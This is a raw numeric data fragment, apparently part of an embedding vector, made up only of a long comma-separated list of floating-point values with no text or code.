.015153991,0.0036185253,-0.008360907,-0.0108219,-0.001995442,-0.0030338212,0.004318207,0.003895093,-0.021551263,0.00045282615,0.01601933,0.0055512395,0.0009487801,0.014272752,0.0020291202,0.025730716,-0.027710695,0.015446251,-0.00007883255,0.024578253,0.0076031704,-0.03064631,0.011418926,0.027077572,0.016610898,0.011311125,-0.039582256,-0.0048810258,-0.007886548,0.036361802,0.0067043784,0.005275811,-0.0074269758,-0.015324537,-0.006095339,0.006735144,0.011402945,0.009492531,0.0076042637,0.0014481046,-0.021220325,-0.0029063611,-0.004041961,-0.000012044937,0.0073828846,0.010183691,-0.0016192091,0.013108813,-0.021229506,-0.0037598244,0.015865546,0.028848879,0.0035104244,-0.0059366515,0.024254227,0.009119105,0.027074791,-0.003584846,0.014506409,0.012982888,0.025119273,0.0030850207,-0.012555783,0.024201468,-0.023005478,0.017495243,-0.018383259,-0.02191557,0.025855292,-0.01245361,-0.011817033,-0.028341271,-0.005118812,0.017485144,-0.0037428245,-0.0020422982,-0.023666395,0.0017844635,0.0026132576,-0.0050428226,-0.0065893605,0.0024613694,-0.011341789,0.01709757,0.0019017668,0.006802715,0.00538086,0.0029321257,-0.001274468,0.0060228473,-0.00047676297,-0.00594572,0.014672251,0.009036856,0.013289338,0.018158628,-0.0019824475,-0.05616023,-0.008620966,0.005159996,-0.010171226,-0.0074782176,0.05229406,0.00018562588,0.008568417,0.008383855,0.008801125,0.010157183,-0.0017956061,0.02063683,0.0026178013,-0.0054707862,0.008524985,-0.0051719253,-0.008589818,-0.006587387,0.007074118,0.0020858026,-0.005525478,0.0048131477,0.026250439,-0.023436274,-0.0048589013,0.017038457,0.04127325,-0.014497901,0.016337615,0.00084813626,-0.018940855,-0.0011783148,-0.011339927,0.06279562,-0.0010173959,-0.025953323,-0.01658951,0.0037746965,-0.0135508245,0.01689754,-0.011928293,-0.013101533,-0.0019579977,0.012360985,0.0027349566,0.012845752,0.009446494,-0.008913683,0.0012526623,0.00579073,-0.008829917,-0.0007654466,-0.0017918018,0.002238914,-0.0038646746,-0.016628651,-0.032771375,-0.025607709,0.007918688,0.03320557,0.013423841,0.0033068862,0.006600661,-0.013791674,-0.0045169448,0.006907596,-0.0013376869,0.017263621,-0.0019633318,-0.011822461,0.020845555,-0.010253999,0.00017328376,0.017614953,0.021180877,0.0061648292,0.029791253,0.013143758,-0.003356261,-0.0054195533,0.01348299,0.0061823,-0.003216516,-0.021413123,0.01810305,0.024545088,-0.012441323,-0.014610217,-0.008549607,0.012367518,0.016558249,0.0034334138,0.016499855,0.010929336,0.004278519,-0.02246303,-0.010605912,-0.0032267536,-0.008692799,-0.012607702,-0.016077396,0.00059773866,-0.031828497,0.0008003725,0.012521112,0.010102417,-0.015122764,-0.0030477848,-0.0012972254,0.016876208,0.025921885,0.002197846,-0.0028271046,0.0071087093,0.0066125407,-0.0036035234,-0.0055618994,-0.01061333,0.0019461699,-0.020640537,0.0129526695,-0.014137825,-0.01614023,0.01700004,0.010320794,0.00061702175,-0.0003872066,0.023067847,0.018391462,-0.01933328,-0.012173069,-0.014608324,0.0076008607,-0.0071908417,-0.022962157,-0.025381789,0.03662338,-0.0080243405,0.00028379873,0.0017612424,0.009377858,0.012370279,-0.012238764,0.013088836,-0.07881299,0.01333724,0.0069073676,0.022521015,-0.01717074,0.0401762,-0.02049898,-0.002626838,0.0024464214,-0.01773767,-0.0050565423,-0.0028487165,0.014217099,0.0087511325,0.018260226,0.011355399,-0.01579796,-0.016684314,-0.008302978,-0.03506168,0.019675387,0.043355912,0.0028370821,0.00033418214,0.011096905,0.014758887,-0.0044016736,-0.0054025277,0.009473136,-0.022921573,0.018140014,-0.0021502564,-0.012066269,-0.010143561,-0.015354957,-0.010226369,-0.0048727607,0.0027353393,-0.014439192,-0.0026633267,0.009206692,-0.016904071,-0.025713852,-0.004728593,-0.020529253,0.02968245,0.00005335763,0.0011750459,0.0037893949,0.013948138,0.014275238,-0.005529613,0.0014616192,0.0052378643,-0.019262651,-0.0036429958,-0.01340531,0.02987024,-0.004478005,-0.013990789,0.019521909,0.021242848,0.023269113,-0.0043145115,0.010668292,0.007365941,0.021022232,0.003665785,0.011896107,0.023224887,0.018738082,-0.0012185086,0.013196542,0.005036376,0.021399604,0.02001957,0.0018388358,0.01686689,0.004085266,0.0022303888,0.0074085733,-0.031688523,-0.008594934,0.012107113,-0.0007766179,0.00012661278,0.021530136,-0.008217964,-0.004264737,0.00006942986,-0.003681528,0.018095708,-0.02269312,0.013580263,-0.008406358,0.005009442,-0.019989409,-0.025854824,-0.001341503,-0.0087627955,-0.0020570091,-0.002095894,-0.009758399,-0.026173593,-0.00048556918,0.0013689096,0.0013916428,-0.039761648,-0.0077398,0.034819108,-0.0025119446,0.008716335,0.0058293887,-0.0009500471,0.021102352,0.029106406,-0.012718218,0.008032194,-0.0067892135,-0.014337604,0.011398672,0.008435431,0.018123716,0.0032192373,-0.006346864,0.019609816,-0.015524757,-0.011712333,0.009909209,-0.01690682,0.03457064,-0.0055572647,0.0028164247,-0.004632762,-0.011820049,-0.020679168,0.0047767824,-0.01653746,-0.008720925,-0.02950387,-0.0035566513,-0.013319876,0.019885108,-0.008658673,0.02865966,0.006771068,-0.004628194,0.0017585936,-0.012583415,-0.0025469342,0.021846578,0.027856043,-0.013706409,-0.0032611338,-0.018089047,0.017668178,-0.002254245,0.017228048,0.00031749904,-0.010451197,-0.020623451,-0.002924843,-0.0010864434,-0.018521836,0.00335872,0.0093828635,-0.029196097,0.02588735,-0.0047905035,0.014468536,0.004869276,-0.003118755,-0.015489896,0.0008722339,-0.019956697,-0.025259972,-0.035041675,0.01354884,0.004623342,-0.01670915,0.009500319,-0.017204195,-0.018002806,0.014889301,-0.01190961,0.009898809,0.019022925,-0.0026637996,0.014380728,0.0036183894,0.0022565129,-0.0023063587,0.017742474,-0.016179908,-0.008239337,0.0035846173,-0.009229003,0.02316327,-0.003949388,-0.00041476704,0.026353871,0.0017518284,-0.03832477,0.0109113315,-0.0027706672,-0.011940041,-0.018482937,0.023335822,-0.027600722,-0.004352974,0.013913772,0.000560037,0.01317293,0.009080572,0.018087074,0.003013273,-0.01725069,-0.011647636,-0.026413389,0.0018476065,0.00622792,-0.0065471637,-0.011099215,0.0017271759,-0.011405023,-0.0076780296,0.0036727872,0.025800051,0.006610411,0.019594755,-0.0063576973,0.00623152,-0.013106563,-0.030658673,0.015589297,0.0043510688,0.0032452692,-0.004184663,0.009172999,0.0036778161,0.015477425,0.017896287,-0.009777106,-0.0014873929,-0.0053142044,-0.019272145,0.0073602595,0.0045115147,-0.019832121,-0.0041295947,0.023871966,-0.042430617,0.028020136,-0.015728679,-0.005855566,0.02214716,0.014012543,-0.0027948886,-0.013344591,-0.02257428,0.016803728,0.011342812,0.0069360803,-0.012424296,0.004641231,0.014180957,0.017992977,0.004496417,-0.0049835425,0.0056332853,-0.00907267,0.021113807,0.01109688,0.01477066,-0.0026905043,-0.004932191,-0.017560812,-0.0016174606,0.024419539,0.016557336,0.022253899,0.032967843,0.006606603,-0.013107955,0.008307607,-0.026867578,-0.003210236,0.023317281,0.00011963535,-0.009933212,-0.007933291,0.03141375,0.01075462,-0.016463859,0.005876576,-0.005196998,-0.07959865,0.017200725,0.003927313,-0.011630889,-0.018952211,0.017618502,0.011064576,0.012381625,0.04118306,-0.009365093,0.0020847232,0.0045216074,-0.009364344,-0.006894109,0.0071571534,-0.022648778,-0.017416537,0.028708966,0.021604905,-0.006402567,-0.00010128738,0.0041148528,0.010520763,-0.007542666,0.0033810579,-0.005578463,0.0014731026,0.006711737,-0.007693467,0.020204738,0.0081786085,0.013980754,0.0074292403,0.01547552,-0.016049614,-0.010445046,0.0076379087,0.01843436,-0.01849986,0.013969276,-0.00051329745,-0.011921292,-0.015222333,0.0052865515,-0.012710472,-0.0016785029,0.014672291,-0.009886043,0.009495164,-0.03764314,0.022819206,-0.021984043,0.01781629,0.018546078,0.016958883,0.028186563,-0.006983457,0.008139647,0.017559318,-0.0020805798,0.009153265,-0.0024734482,-0.0040056547,0.006188589,-0.022958899,0.011087403,0.010907587,-0.0027249963,0.014462804,-0.014307167,-0.022249997,-0.0059301904,-0.0034907444,-0.00008151406,0.00018946678,0.022878971,-0.0021310207,-0.0039834934,-0.0056632822,-0.005149633,-0.016615085,0.0030203518,0.00030581572,0.0003348194,-0.02477191,0.012603799,-0.01552609,-0.013740806,0.0036961336,-0.015046515,0.008522624,0.020802455,-0.00488767,0.005042737,-0.02653905,0.028392846,0.01475832,0.0057687163,0.0011641335,0.0005199427,0.018715454,-0.0017395634,-0.033154894,0.023839416,-0.018089725,0.00056128274,-0.01452419,-0.001648231,0.019481758,0.017001484,-0.00030198076,-0.001833462,0.00521062,-0.006091545,0.034092993,-0.0035557013,0.013302199,0.01431631,0.060201366,0.011423956,0.0027851632,-0.015452357,0.0014137897,-0.013421826,-0.01026421,0.0013041064,0.0094764745,0.008306794,-0.015328566,0.035162155,-0.008662515,0.004583442,-0.00018483955,-0.009015161,0.025856778,-0.008432784,-0.010001292,-0.00016788786,-0.013336655,0.0033148613,-0.0041806446,-0.009744441,-0.031323608,-0.0023614028,0.012285835,0.007823308,-0.018744241,0.015769172,0.0056377295,0.009303078,-0.00053973956,-0.007297602,0.00034214137,-0.016432839,-0.0162584,0.015017411,-0.015971236,-0.020596832,0.0060128975,0.012313891,-0.013812633,-0.029022409,0.015948623,-0.015199427,-0.021346333,-0.013891138,-0.016433038,-0.0020763003,-0.010146308,-0.004437163,0.012531217,-0.0023155843,-0.012903666,0.017642515,0.0076025566,0.0011422666,0.030802647,-0.002289367,-0.023176223,0.0063831736,0.009285664,0.0214384,0.012788911,0.021094838,0.0200451,-0.03635385,-0.022303784,0.012985702,-0.026186306,-0.011268692,-0.017813388,0.014265735,0.0031760845,0.0028338442,-0.010795927,-0.0021130673,0.01589312,0.007179651,0.0038898713,0.005846452,-0.031208025,0.009113552,-0.00047050504,0.00505412,0.002542258,0.0043446394,0.010966331,-0.017822973,-0.014000841,-0.018332608,-0.0022259501,-0.009418056,-0.0033601155,-0.017622098,-0.017512295,-0.0065759984,-0.030745167,0.0019206249,0.018901763,-0.008028985,0.012012521,-0.018928634,0.022726985,0.0030009695,0.007849518,-0.012069391,-0.00778975,0.008286688,0.013198723,-0.0022774427,0.030640688,-0.005318953,0.03489509,-0.0061968877,-0.010662193,0.017961472,0.0044870125,0.0073954063,0.012969571,-0.030233178,0.00045357834,-0.004164062,0.0066269897,0.012500389,-0.00003449439,0.039646134,0.0022433468,-0.0027928962,0.021472016,0.020297002,0.011447096,-0.0056538656,-0.0010377675,-0.012212019,-0.003469203,-0.0065941573,-0.007823856,0.0006232697,-0.023585498,-0.017186226,0.00646382,-0.012228825,-0.004002637,0.004124122,0.016580699,-0.011796477,0.022175265,0.012839174,-0.010129097,0.004204515,0.0034252547,0.010059763,0.015329888,-0.004946592,-0.000058116708,0.0024447842,-0.018278817,-0.018430173,0.02186508,0.017930593,0.001595788,-0.004504817,0.0063700173,-0.037173245,0.011758442,0.04191989,0.009587105,-0.024873383,0.017565148,-0.020557467,-0.004598969,-0.0086898,-0.00040620993,0.009160347,0.018640865,-0.024780808,-0.005940324,0.019326793,-0.0034637877,-0.008804933,0.068595506,0.014222502,-0.0012082629,-0.021551715,0.00887826,-0.02290585,0.006678419,0.009639222,-0.00945028,0.0017996689,-0.017613266,-0.017611502,0.0037209238,-0.0034449932,-0.006989487,0.016657773,-0.0059582414,0.009434094,-0.0032136934,-0.002345854,0.010303651,0.013605527,-0.009432109,-0.0016805285,-0.0015966053,0.023660295,-0.012376794,0.00366435,0.0031044702,-0.0050362535,0.0031779667,-0.005378776,0.009687555,0.010860231,-0.0064741536,0.008510104,0.011351268,-0.0012693316,-0.017343363,0.0025063371,0.007821952,-0.013672089,0.0708245,0.006609353,-0.0009982171,0.0018270815,-0.01509197,0.019728776,0.004412095,-0.022767447,0.010504669,0.008732384,-0.010236241,-0.0098078,-0.007864287,0.019837376,-0.01831907,0.020280141,0.003202429,0.0020072167,0.008652719,-0.005114919,-0.0087307645,-0.008386938,-0.010101989,-0.034172747,0.009080528,-0.019612458,0.023785718,-0.0066795154,-0.013325894,-0.0015544498,-0.0013404607,-0.0104648955,0.017619187,0.00730738,0.027317079,-0.009853398,0.021227866,-0.0065935296,-0.0011322302,-0.007922904,0.023540564,0.007073581,-0.011107915,0.003569235,0.000446017,-0.00008829742,0.046722174,0.0107371695,0.023947619,-0.021382345,0.01879245,0.01645364,-0.026822595,0.018813334,0.009426682,0.012099208,0.0056368276,0.0062558376,-0.0016733265,0.005545062,0.018372009,-0.02122221,-0.020544251,0.0020975766,0.0057864846,-0.032021478,-0.000041690215,0.02289628,0.016770473,-0.0012042454,0.016512262,0.024187358,-0.004422519,0.01749902,0.0068865996,-0.010107353,-0.009298835,0.01099258,0.0067141214,0.023123989,-0.003662155,-0.09521343,0.0064873043,0.23705716,0.00339268,0.015151712,0.021173071,0.012660422,0.0056621255,-0.11515619,-0.01626583,-0.0060805846,-0.007481301,-0.015236882,-0.0075512086,-0.030639026,-0.0014989445,0.009453302,0.022403717,0.012411072,-0.02792759,0.014054364,-0.017748449,0.0154070025,0.014035806,-0.0002809076,0.022306073,-0.028915185,-0.0117640495,0.032313805,-0.015812885,-0.011447457,-0.014796968,0.0046719518,-0.0067861974,-0.00026157562,0.0055761803,-0.023620334,0.009967817,0.017354518,0.009142845,0.0024900732,-0.02637912,0.019526001,-0.0058520506,-0.010019807,-0.027900841,-0.17308186,-0.0044116233,0.013050903,-0.019166796,0.022932222,-0.0035691992,-0.0073788273,-0.0041595884,0.015578438,-0.031807348,0.008254903,-0.002831875,-0.002017513,0.019454101,-0.011020506,-0.0028098032,-0.026622547,0.011111094,-0.007864129,0.0063235075,0.01732929,-0.00498536,-0.015774917,-0.010905361,-0.010235089,-0.009477118,-0.0014251603,0.012432155,0.004085268,0.0070212507,-0.011439291,0.021357387,-0.008468742,0.010420462,-0.008035256,-0.024615094,-0.00035015584,0.011094346,-0.006950341,0.0018413608,-0.00043361535,-0.010407661,-0.008335548,0.013142222,-0.0053819194,0.0033318258,0.019838212,0.004373149,0.012387577,0.009751687,0.0245053,-0.008889474,-0.037233792,-0.006008412,-0.0034143608,0.0012607935,-0.016086858,-0.02642069,0.0038255712,-0.0045169867,-0.00060950755,0.0018359049,-0.01359332,-0.0033839894,0.025462542,0.0062836027,0.005746552,-0.010445173,-0.0014919805,-0.005241436,-0.01197487,0.0057520433,0.024294447,-0.011953663,0.013947694,0.023526806,-0.0030944985,0.017805245,0.018737298,-0.024658322,-0.024008984,-0.0116781965,-0.0023256494,-0.021388646,0.013015948,0.0047564656,-0.0068346593,-0.000826821,-0.016870003,-0.0140311895,0.01283558,0.0025883385,0.0056286496,0.021893043,0.0064760256,-0.006048815,0.03471798,0.0041061803,-0.040344577,0.017134301,0.005023856,-0.015365477,-0.0067113303,0.013265769,-0.011234421,0.014666259,-0.012559524,-0.016571049,-0.03135222,0.0074566854,-0.018268768,0.001709497,0.0033032533,-0.020591367,-0.025046146,-0.032697476,0.023425344,0.0067130844,-0.016257895,-0.0017990659,-0.035642937,-0.015072787,-0.0213163,0.014990167,0.036454756,0.008727194,-0.029054029,-0.00219075,0.0006955987,-0.025942454,0.001924204,-0.005243127,-0.0072969967,0.022330312,-0.009775588,0.005261624,-0.003128183,-0.014358143,-0.032651138,0.0064438414,-0.0008460487,-0.022574926,-0.0010473666,-0.021384314,0.01891796,0.004193374,0.011592752,-0.015350895,0.023271218,-0.0059136874,0.0042499267,0.05084274,0.0012038767,0.0015739374,-0.025440598,0.08557809,-0.0058031683,-0.025906002,0.010599921,-0.0141545255,0.016247643,0.032708712,-0.011824302,-0.0076829903,-0.0075577777,-0.026572146,-0.0033168944,-0.013425668,0.029003136,-0.00051448634,0.034573384,0.0101889735,0.024952902,-0.0019914396,0.01768247,0.0148770455,-0.017350268,-0.010445037,0.024169695,0.018823076,-0.0023459147,-0.018144235,0.015068965,-0.005596439,-0.009667337,-0.018181799,-0.004920977,-0.0012354094,-0.00682431,0.007674133,-0.054282185,-0.03413752,0.013996437,-0.0013276429,-0.014932439,0.016827552,-0.0012104826,0.015194386,-0.013726032,0.016397633,-0.00074984983,-0.015294412,0.020439547,-0.010759626,-0.0014333323,0.0009972932,0.025351211,0.0024037412,0.0014642816,0.008101356,-0.017328309,0.0053709876,-0.01574218,-0.0007055846,-0.013215754,0.027544888,-0.009419719,-0.020485308,-0.0009183328,-0.012600082,-0.0023876955,0.0059384727,0.0003797181,0.013411497,0.04087626,-0.0075666136,-0.0045260135,-0.0066370964,0.014299575,0.0074547394,0.006763318,-0.020440776,-0.0068803504,-0.0078833,-0.008378733,0.0059944475,0.012214103,-0.0014489068,0.011826359,-0.025801348,-0.05812666,-0.010348774,-0.0044346564,-0.02357423,0.0052255155,-0.0013604503,0.0019120824,0.043786183,-0.005241666,0.01653858,-0.009656285,-0.0059749777,0.0051010055,-0.0041281166,-0.0034285649,-0.019682983,0.021962728,-0.013895734,0.0002194822,0.000057255973,-0.023108149,-0.0016784742,-0.011917477,0.0070662904,-0.024751265,0.00012514557,-0.0016286477,0.000771804,-0.018140119,-0.005407829,0.047457755,-0.019734208,0.009851329,0.00478025,-0.01674219,-0.0045650755,-0.03028511,-0.004225854,0.008699729,-0.0012086785,-0.0019261143,-0.002642555,0.024746813,-0.028562635,0.0107966205,-0.006443042,0.036247756,-0.0062026866,0.025070988,0.026492994,-0.0081111165,0.019871987,0.030111348,0.0056786006,0.007886049,-0.0104764495,0.024572862,0.01588411,-0.0053061,-0.0007614498,0.0076714954,0.0021870744,-0.010057571,-0.007025709,-0.0021991034,0.004271512,0.004803911,-0.010410459,-0.0008414735,-0.0023753764,0.017522905,0.0012410374,0.01017059,0.0041584405,-0.0039584823,-0.0065901917,0.007081553,0.017085006,-0.007711203,-0.022847146,0.020997716,0.0049410993,-0.0034208081,0.007267013,0.0017782702,0.0044729295,-0.01472971,-0.00025522627,0.006945825,-0.0226239,-0.0056110867,0.0075386874,-0.002885703,-0.016630573,0.018368486,0.027886573,0.0067345356,-0.016415607,-0.0014767111,-0.002947457,-0.010745714,-0.017215751,0.021228353,-0.019325715,-0.0076188445,-0.00008876996,-0.00044344147,-0.005815125,-0.0148205785,-0.022888916,0.01213502,0.008233624,-0.006412474,-0.0022590214,0.009746295,0.012823168,0.03809299,-0.012064834,-0.025517737,0.007377736,0.0119897965,-0.029585514,0.015436316,-0.030853854,0.007068748,-0.018316804,-0.012973071,-0.017927025,0.020209521,0.002027072,0.0071240533,-0.0054772208,0.017761633,-0.0077765123,-0.021046437,0.007104838,-0.0075305267,0.011572169,-0.0036939573,-0.040787827,-0.025501534,-0.0030743673,0.043575563,-0.0054593617,0.010505498,-0.0014151061,0.037672736,0.0104346685,0.0120195,0.008151639,-0.024576945,-0.023918498,-0.006301146,-0.026145434,-0.008318317,-0.0017640135,-0.011238469,-0.016159648,0.008988079,-0.011218617,-0.022700595,-0.004668204,0.0013361535,-0.0029426184,0.0065928344,0.000802604,-0.017697413,-0.059153803,-0.0030651959,0.027449725,-0.017001595,0.010610756,-0.012790844,-0.009353063,-0.020806095,-0.009568506,-0.020108435,-0.016895993,0.006336708,0.008161919,0.016717564,0.020678602,0.022951033,0.009113501,0.010216631,-0.037796438,-0.010732404,-0.012843376,0.01859965,0.01600567,-0.0057787956,0.0056287386,0.00024677426,0.028881585,0.0069614877,0.008857829,0.004839289,0.004158548,0.0015170114,-0.0068500154,0.009817706,0.014542421,0.016090518,-0.013046565,-0.008918552,-0.020689778,0.007431598,0.014030567,0.0028484387,-0.030595506,-0.00955275,0.0072995704,-0.008745615,0.02241553,0.0110982135,0.010173412,-0.011189019,-0.0039392887,0.003911644,0.006394022,-0.010371851,0.014412024,0.007216831,0.013959688,-0.013482632,-0.007120557,0.0046832003,0.010502857,-0.026640931,0.000006752461,-0.0029260116,0.007985308,0.010967581,0.0062606195,-0.02409875,-0.0060702097,-0.01549038,0.014431086,0.013228321,0.0040444355,0.015068112,-0.022416605,-0.013127131,0.006141387,0.012405975,0.01299678,-0.014752712,-0.0070832097,-0.16162607,0.011484259,-0.007754274,-0.026787149,-0.019976957,-0.013671589,0.013424237,0.05768575,0.010848098,-0.027648393,-0.018620877,0.01918188,-0.005303254,0.007680799,0.0051317583,0.025955252,-0.011275278,-0.005553453,-0.0032089942,0.012839801,0.00053894165,0.012378982,-0.010915762,-0.021851923,-0.011573576,0.010901425,-0.013987781,0.014298183,0.019929407,-0.0029088168,0.013017359,-0.0037684997,0.010682082,-0.0054460983,-0.010010292,-0.0060404185,-0.0077859615,0.023791596,-0.02692488,-0.001122322,0.006342827,-0.0020925403,-0.008106496,0.009173648,0.0037593017,-0.00423046,0.014176652,0.016454868,0.0145917935,0.015462727,-0.028795043,0.0056901397,0.016048549,0.0014648242,0.010874349,-0.009305205,-0.017419918,0.011862172,0.010275834,-0.0082270885,0.015548783,0.034440685,0.0050421385,-0.021727175,0.006501484,0.0023483709,0.006208986,-0.00864985,-0.017005337,-0.0023320322,0.0121503575,0.02258749,-0.007023798,0.0050526178,0.007666152,0.009121201,0.02814175,0.015616645,0.009010159,0.02758993,-0.027070137,0.0016173654,0.0019811231,-0.007813746,0.0071318923,0.011080478,0.0034438306,0.0018477296,-0.020454168,-0.02723984,0.019948108,0.012959985,-0.018975507,-0.033551555,-0.0020204938,0.018211003,0.009137448,0.029286595,0.0070680096,0.0033485987,0.010965378,-0.00061705103,0.0024036174,-0.025449347,-0.14602965,-0.0047130724,0.017388757,-0.0095013585,-0.019856768,-0.0029430853,0.015944706,0.01145293,0.026991282,-0.009668468,-0.010406925,0.00074387237,0.019040076,0.007900791,-0.004307365,0.008945827,-0.034110986,0.005356865,-0.018313019,-0.012113485,-0.007588747,-0.007585933,-0.04672804,-0.0047438443,0.0010583678,-0.0071699526,-0.0012664383,0.029660467,0.017349035,-0.033743713,-0.00439789,-0.013685102,-0.008382801,0.019587636,-0.028007712,-0.016584521,-0.019440768,-0.019726763,-0.0021968924,0.01655923,0.0074473177,-0.018148035,0.0016439593,-0.0044188364,0.003575863,0.01565917,-0.004021809,0.008521141,0.031853467,0.0017253272,-0.012799115,-0.0038535683,-0.014578727,0.0005243523,-0.0005507459,-0.01022466,-0.021356473,-0.010929651,-0.017330155,0.0009475958,-0.023435332,0.017814552,0.0038496403,0.01327446,-0.011127471,0.024720363,-0.0091789765,0.009584225,0.0015892958,0.0029825913,-0.018706728,0.017050436,0.027443593,0.0035225162,0.0124214105,0.013440413,0.004682939,0.042239632,0.020228479,-0.013152544,-0.0086994665,-0.01242415,-0.015193957,0.0014094263,-0.008694972,-0.014925865,0.002849831,0.025149569,-0.00893502,0.015517595,-0.0043618907,0.024634395,-0.018357463,-0.015990542,0.0008011906,0.020857489,0.015234849,0.00004300423,-0.018361688,0.0070157126,-0.042084374,-0.025241455,-0.010850831,0.018555004,-0.008066619,0.012617521,0.01411015,-0.0185057,-0.016439887,0.0118971625,0.00022769385,0.009706811,-0.016116979,0.016856778,-0.019406173,-0.0060586077,0.00034165283,-0.00697246,-0.0004877456,0.007340818,-0.019670887,0.013159764,0.0020757618,0.0034851162,-0.011687929,-0.007743717,-0.0072992765,0.02442998,0.0061449367,-0.01800166,-0.00081199553,-0.009825597,0.019944487,-0.033662073,-0.01637901,0.002970706,0.014309454,0.010016143,0.0044068876,0.009518868,0.019471206,-0.0010986432,0.010633363,0.000678959,-0.006569218,-0.004333357,-0.01242285,0.0011399013,0.001804471,0.0020504296,-0.011738749,0.0040136464,0.023240881,-0.017721279,0.014144696,0.013959622,-0.00081168505,-0.008110997,0.011913768,0.008671543,-0.0025138473,0.005257355,0.009122664,-0.004298338,0.011937875,0.006595043,0.018916493,-0.025842614,-0.011497507,0.00085019105,0.026499078,-0.0026409987,-0.0004673551,-0.016845252,0.013220678,0.0154668735,0.02407268,0.025389293,0.01295858,0.012321215,0.0054683513,-0.008240749,0.00001715078,-0.0053678364,0.0080820015,0.008013087,-0.012149793,-0.00442714,-0.0023637423,0.005271259,0.04415876,0.00075042224,-0.026301114,-0.0016451029,0.029264782,-0.014594437,-0.005329406,-0.0038988867,0.008182359,-0.0061393557,0.0042637317,0.030541701,0.011126363,-0.0047466913,-0.0100467075,-0.0075566745,0.0025091097,0.029517496,0.026891822,-0.00029250936,-0.016873186,0.0033782206,0.003700344,0.0058670896,0.01226561,0.025093975,-0.0061055687,-0.025126368,0.023189818,0.0067384946,-0.0012130989,-0.008132612,0.010005704,-0.015952136,0.0058720093,0.018620608,0.010990494,-0.014252898,-0.00373298,-0.014193544,0.014629073,0.0027512144,-0.010131767,-0.002605487,-0.006539692,-0.002568881,0.0044596726,-0.008987791,0.0037619767,-0.00056817464,0.015432286,0.024228666,0.020978786,0.014933921,0.0071560955,-0.014750673,0.008330613,0.005447541,0.013053425,0.022742525,0.016185071,-0.015990173,-0.008631459,-0.01876701,-0.0043848716,0.0072260597,0.0034365528,-0.0038432027,-0.011106883,0.021919375,-0.0239629,-0.010102953,-0.01172949,0.03409303,-0.01209266,-0.021318153,0.023681093,-0.019674467,0.0041084923,0.009172242,-0.0023347938,-0.013060745,-0.0009563369,0.018187912,-0.00042505536,-0.019919282,-0.024906207,0.00088538305,-0.0029326514,0.005127467,-0.0040515685,-0.024509575,0.0026677852,-0.0132198,0.0022089796,-0.0017286678,-0.004188385,-0.010396846,-0.0044626347,-0.0027171813,0.018376753,0.0014699406,-0.010998699,-0.033159778,-0.017623292,0.012205985,0.035715345,-0.0191899,-0.026360858,-0.019823834,0.017693263,-0.01341262,0.00067419786,0.02180451,0.011995493,-0.023592647,0.0005979705,0.021623705,0.006057888,-0.014331312,0.0023067084,-0.00055275456,-0.010493419,0.010702376,0.014228305,0.013968291,-0.01575118,0.011574605,-0.021756645,-0.006644888,0.008944734,-0.004872615,0.02678898,-0.001596152,0.024433542,-0.000114290444,0.00776855,0.0010307612,-0.010386966,-0.00014018963,0.0145974755,0.011340323,-0.0022019956,-0.02249023,0.00015428652,-0.015596497,0.0043216734,0.0148606,0.00046423014,0.016019033,0.0016811709,-0.0063187615,-0.00232677,-0.014507198,-0.009728518,-0.00043143562,0.0070222197,-0.0070078108,0.015154832,-0.0025895806,0.0030128022,-0.004087604,-0.0060682325,0.020733934,0.009143329,-0.006483121,-0.017200705,-0.007393343,0.014780253,0.03457766,-0.021529835,0.011352866,0.00031674735,0.00440112,-0.004370581,-0.0070263324,0.0008361382,0.0042170533,-0.0039600944,-0.007323511,-0.011242846,0.006355315,-0.015361699,-0.013561515,-0.0102912625,-0.07842066,-0.0025115255,0.00115235,-0.027431808,0.015784394,0.015277471,-0.017600477,-0.008385689,-0.013874704,0.03244708,-0.01721949,-0.007445211,-0.00912127,0.015570512,0.018533569,-0.0072736526,0.0013519346,0.0066860886,-0.0119587,-0.0059195263,-0.022001084,0.017797526,-0.0044536814,-0.016157808,0.005310148,-0.008982658,-0.0019217688,-0.010122351,-0.0070978166,0.0111535005,0.009290628,-0.010946151,0.0058117686,-0.02226077,0.012135174,0.011110214,-0.0119375475,0.002634069,0.006522861,-0.0031204512,0.0003722173,0.0023087952,0.014187675,-0.006833946,-0.0042758067,0.012429316,-0.034051973,0.010305954,-0.003929755,-0.018389331,-0.007882722,0.01170064,0.0021788809,0.015163638,0.0012886468,0.021288903,0.011513198,-0.016490215,0.026278595,0.002683945,-0.0093447715,-0.013066292,0.012011556,-0.004957091,0.005345658,0.009484438,-0.014048834,0.02263353,-0.013034466,0.020286562,0.019278415,-0.017807303,-0.02195605,-0.017494427,-0.018890016,0.0052954117,-0.0018520926,-0.011127026,-0.007327171,0.0015651315,0.031198934,-0.0065350984,0.024284454,0.011170991,0.000007606594,0.006578186,-0.01221138,0.010027345,0.021711932,0.013222908,-0.0054417145,-0.015270358,0.010194877,-0.0035316746,-0.014016165,0.028028212,-0.00047615418,0.0056601027,0.01670865,0.026550546,-0.011594918,-0.019415181,0.013373212,-0.0008407713,0.0039575035,-0.014748586,-0.017767038,0.00079972256,-0.0009973662,-0.013541988,0.008641642,0.015827741,0.033794735,0.009872445,0.0042777765,0.007047335,-0.0072625075,0.020459134,-0.025777483,0.0035358747,-0.01591711,-0.002823542,-0.016024916,0.0008264496,0.0055637285,0.0064454745,0.0010322308,-0.012381102,-0.016091345,-0.014397762,-0.0051136725,0.021986859,0.016238082,0.025715446,-0.0013564081,0.010050113,0.005745641,-0.00017248715,-0.0133153545,0.0046755318,-0.0153379915,-0.042643093,0.015922194,0.00511279,-0.004505021,0.029014735,-0.022420527,0.0064439164,0.011869197,-0.0069353627,0.000796205,0.0046742596,0.012874855,-0.0053353743,-0.012153503,0.005505644,0.018518565,-0.008380665,0.0071676164,-0.022631044,0.004148863,0.020259606,0.021142343,0.0020474906,-0.014995849,0.006711603,0.015733363,0.0010543743,-0.020665782,-0.042201947,-0.008441481,0.0019588824,0.01782049,-0.014617451,-0.029347785,0.012375359,0.02436962,0.0037340205,-0.0119772805,-0.0034662979,-0.009754737,0.011066706,-0.0034252284,-0.0013981028,-0.008141383,0.007871162,-0.007706139,-0.00032893714,0.0077827587,-0.015611063,0.015984874,0.007925864,-0.0013827778,0.007598787,-0.015064179,-0.00002310237,-0.000008273677,-0.008208988,-0.017103972,0.0075297845,-0.02528164,-0.0054477802,-0.0048913653,0.0009237849,0.015652278,0.026206763,0.0040603955,-0.0065161963,0.006519151,0.007920149,0.0077389115,-0.0028594963,-0.005164706,0.11964678,0.03018808,-0.01425723,0.004030249,-0.00555997,0.0004412207,0.024127215,-0.004744147,0.002338804,0.00906568,0.010784084,-0.0051922463,0.0026185547,0.0073320474,-0.0004536059,0.041545406,0.0023428644,-0.020065049,-0.0003118859,